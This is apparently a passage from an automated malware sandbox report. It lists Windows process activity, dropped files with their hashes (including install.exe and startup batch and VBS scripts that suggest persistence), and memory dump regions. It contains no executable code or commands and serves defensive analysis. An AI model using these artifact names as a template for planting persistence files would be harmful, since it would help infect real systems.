C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5ac3d19fbb5c5f10833f1882308f77548
SHA1ac880466fd99a5719fedc7289b00d78ba7088e06
SHA2563353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df
SHA512b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5602697434d1fbc5948155cd4b07cef92
SHA1b830614c93452a2a3aeef20a51ec7775bb898b5e
SHA256b34b9a6d135915c198765c443feb086d073832e672ce4453f2f04788a9403aab
SHA512a2e895eaea85cd5302eeb59143dcfa65630f7321d91bbe0f1559249f10b772fa0d4ea5aa79616a06c64ee486fca22759286e86dafff72acf7a11bc515a49ecec
-
C:\Users\Admin\AppData\Local\Temp\GGJD5csip1tk.batFilesize
276B
MD541cb236d5025fe4aa30916db372b7eab
SHA1fede30b6d6aff06b5d56c762b64d68e7196dc465
SHA256c56c84ebe8652c8b66de4b8fea77b81aca7d74a40d3011ccd877f75cc2a8be52
SHA512b8de4588b76bce88c04c2bbf4939c968a7dd737ff4d3cef2af246babbe0b45124d135842c52a189750c576ac88b502bf741088e076f4455c06055467e04b572e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xpgydi4.lbp.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-14-~1Filesize
224B
MD5a84397af7dc1ce2cee71c76d03b1bcd7
SHA1e545cc3ec6e4de56028bfddcf1929364d403048e
SHA25602f75c4e6aa15bbb6329a9f44baf2a6804f514941bc98a2af2464d704144afbf
SHA512095db46a47071b24ce4a79d53d9440344d86435b17bb584c58419f1207827a1f263ee334009b43bfa57353906df2fcad750126fef67101b6980656a9a8366716
-
C:\Users\Admin\AppData\Roaming\startup_str_392.batFilesize
513KB
MD5a84be587721ab2558489178539f283e6
SHA15a48f5c98f7366d13f371965c19c98a5754bd90b
SHA25632cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
SHA512c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
C:\Users\Admin\AppData\Roaming\startup_str_392.vbsFilesize
115B
MD553d92eb6350fdb3e9ec2c3fb1752723b
SHA1c26216a618184875ef9c3da5523d217002d064cf
SHA256b92104fd3958f17653ab3e8923807fae4920eecc046abdb90663989122debf75
SHA5121f78e4504a941f93df78ff8891bdaf60256783a19eeddff5b91f06a3773252a24f8aa9b446bba974fc8efa4ef9528ffe5ea81ccf7b3aaaa9fd691d42b28ac445
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187Filesize
412B
MD5d8a99f426be6a1c0f9a8c574d87acd08
SHA1258650a28621fd86ac87f046c478eda527f5c4bc
SHA256bfbcdd06b348856a4ffeddd879e0b1b17415e2b1ce7a701e378ba4708e2a1a17
SHA5127571968ca45dcf4181dbd9c9d1b5849f29ccc48ad6b065dbd072c4b93ffa019da3874782531c107a9563c051743bdf81d592ff00a50f9dba49575e61aad9df09
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d61d7f65117823a52913b840feed43c6
SHA1e2580207e1611dcb229ee9d2b4bb0bd4dbcc884f
SHA256d0d50cb4ab1fe4b5dcb9c081d49b33381336fc0ebc7629702ed94d47f7032a86
SHA512e4cf12f3642ce8746f39bcfaa6265d105919d1cbe863119f4413aa4c5d307d7d69f0638bd0434d47f651e183ec209f02dd7d44954c790ef4d585155817ed8a3c
-
memory/316-64-0x0000000070240000-0x000000007028B000-memory.dmpFilesize
300KB
-
memory/316-65-0x00000000096D0000-0x00000000096EE000-memory.dmpFilesize
120KB
-
memory/316-72-0x0000000009C10000-0x0000000009CA4000-memory.dmpFilesize
592KB
-
memory/316-73-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-63-0x0000000009710000-0x0000000009743000-memory.dmpFilesize
204KB
-
memory/316-66-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-166-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-44-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-45-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-46-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-158-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-71-0x0000000009970000-0x0000000009A15000-memory.dmpFilesize
660KB
-
memory/584-256-0x0000022D64A80000-0x0000022D64AA5000-memory.dmpFilesize
148KB
-
memory/584-257-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-258-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-264-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-265-0x00007FFF884F0000-0x00007FFF88500000-memory.dmpFilesize
64KB
-
memory/636-275-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmpFilesize
172KB
-
memory/636-269-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmpFilesize
172KB
-
memory/636-276-0x00007FFF884F0000-0x00007FFF88500000-memory.dmpFilesize
64KB
-
memory/728-287-0x00007FFF884F0000-0x00007FFF88500000-memory.dmpFilesize
64KB
-
memory/728-280-0x0000029A1F940000-0x0000029A1F96B000-memory.dmpFilesize
172KB
-
memory/728-286-0x0000029A1F940000-0x0000029A1F96B000-memory.dmpFilesize
172KB
-
memory/908-291-0x000001FAEE580000-0x000001FAEE5AB000-memory.dmpFilesize
172KB
-
memory/908-297-0x000001FAEE580000-0x000001FAEE5AB000-memory.dmpFilesize
172KB
-
memory/908-298-0x00007FFF884F0000-0x00007FFF88500000-memory.dmpFilesize
64KB
-
memory/1004-302-0x0000028C31FC0000-0x0000028C31FEB000-memory.dmpFilesize
172KB
-
memory/1280-218-0x0000023BB1900000-0x0000023BB1922000-memory.dmpFilesize
136KB
-
memory/1280-240-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/1280-221-0x0000023BC9F50000-0x0000023BC9FC6000-memory.dmpFilesize
472KB
-
memory/1280-239-0x0000023BC9EF0000-0x0000023BC9F1A000-memory.dmpFilesize
168KB
-
memory/1280-241-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmpFilesize
696KB
-
memory/1616-253-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1616-242-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1616-248-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/1616-244-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1616-245-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1616-243-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1616-247-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1616-249-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmpFilesize
696KB
-
memory/3080-205-0x0000000009480000-0x00000000094BE000-memory.dmpFilesize
248KB
-
memory/3080-213-0x0000000009A90000-0x0000000009A9A000-memory.dmpFilesize
40KB
-
memory/3080-204-0x0000000006D80000-0x0000000006D92000-memory.dmpFilesize
72KB
-
memory/3080-201-0x00000000094E0000-0x0000000009572000-memory.dmpFilesize
584KB
-
memory/3080-200-0x0000000009330000-0x000000000939C000-memory.dmpFilesize
432KB
-
memory/4608-30-0x0000000009F60000-0x000000000A5D8000-memory.dmpFilesize
6.5MB
-
memory/4608-12-0x0000000007FA0000-0x0000000007FBC000-memory.dmpFilesize
112KB
-
memory/4608-25-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/4608-14-0x0000000008810000-0x0000000008886000-memory.dmpFilesize
472KB
-
memory/4608-6-0x00000000076A0000-0x00000000076C2000-memory.dmpFilesize
136KB
-
memory/4608-0-0x000000007366E000-0x000000007366F000-memory.dmpFilesize
4KB
-
memory/4608-32-0x0000000003280000-0x0000000003288000-memory.dmpFilesize
32KB
-
memory/4608-203-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/4608-3-0x0000000004C40000-0x0000000004C76000-memory.dmpFilesize
216KB
-
memory/4608-13-0x0000000008790000-0x00000000087DB000-memory.dmpFilesize
300KB
-
memory/4608-9-0x0000000008140000-0x0000000008490000-memory.dmpFilesize
3.3MB
-
memory/4608-31-0x00000000094E0000-0x00000000094FA000-memory.dmpFilesize
104KB
-
memory/4608-34-0x000000000B5E0000-0x000000000BADE000-memory.dmpFilesize
5.0MB
-
memory/4608-7-0x0000000007740000-0x00000000077A6000-memory.dmpFilesize
408KB
-
memory/4608-8-0x0000000007E70000-0x0000000007ED6000-memory.dmpFilesize
408KB
-
memory/4608-4-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/4608-5-0x0000000007840000-0x0000000007E68000-memory.dmpFilesize
6.2MB
-
memory/4608-33-0x0000000009780000-0x00000000097E2000-memory.dmpFilesize
392KB